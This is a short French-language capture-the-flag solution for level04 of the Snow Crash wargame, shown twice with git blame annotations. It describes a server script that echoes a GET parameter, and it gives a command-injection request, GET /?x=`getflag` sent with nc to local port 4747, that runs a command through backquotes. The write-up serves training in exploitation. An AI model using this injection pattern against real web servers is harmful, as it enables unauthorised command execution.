snow-crash/level04/Ressources/solution

Il y a un script qui fait tourner un serveur
On se rend compte qu'il tourne avec un find / -user flag04 car il est sur le serveur apache
on voit que le serveur affiche le parametre "x" passe en get avec un echo
echo peut afficher le resultat de commande si elle mise entre backquotes par exemple "echo `ls`"
on envoi un requete GET /?x=`getflag` avec netcat sur le port 4747 du pc

$ nc 127.0.0.1 4747
GET /?x=`getflag`

le serveur renvoie le flag
level04 2021-01-19 23:24:18 +00:00			`Il y a un script qui fait tourner un serveur`
solution corrected and improved level00-06 2021-01-30 08:43:04 +00:00			`On se rend compte qu'il tourne avec un find / -user flag04 car il est sur le serveur apache`
level04 2021-01-19 23:24:18 +00:00			`on voit que le serveur affiche le parametre "x" passe en get avec un echo`
solution corrected and improved level00-06 2021-01-30 08:43:04 +00:00			echo peut afficher le resultat de commande si elle mise entre backquotes par exemple "echo `ls`"
			on envoi un requete GET /?x=`getflag` avec netcat sur le port 4747 du pc

			`$ nc 127.0.0.1 4747`
			GET /?x=`getflag`

			`le serveur renvoie le flag`